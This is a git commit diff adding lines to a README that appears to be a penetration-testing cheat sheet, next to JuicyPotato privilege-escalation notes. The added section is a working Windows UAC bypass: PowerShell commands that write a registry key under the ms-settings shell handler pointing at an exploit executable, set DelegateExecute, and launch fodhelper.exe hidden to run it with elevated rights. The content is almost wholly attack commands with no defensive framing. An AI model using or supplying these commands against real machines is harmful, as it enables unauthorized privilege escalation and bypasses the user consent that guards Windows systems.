Update README.md

This commit is contained in:
Joe Totes
2022-09-26 23:32:00 -04:00
committed by GitHub
parent 5c3ee2c321
commit 65ba5c001a

View File

@@ -903,8 +903,11 @@ JuicyPotato.exe -t * -p {run.exe} -l 8003
https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md
# UAC BYPASS
where /r C:\windows fodhelper.exe
New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value {C:\Path\to\Exploit\exploit.exe} -Force
New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force
cmd -> fodhelper
powershell Start-Process C:\Windows\System32\fodhelper.exe -WindowStyle Hidden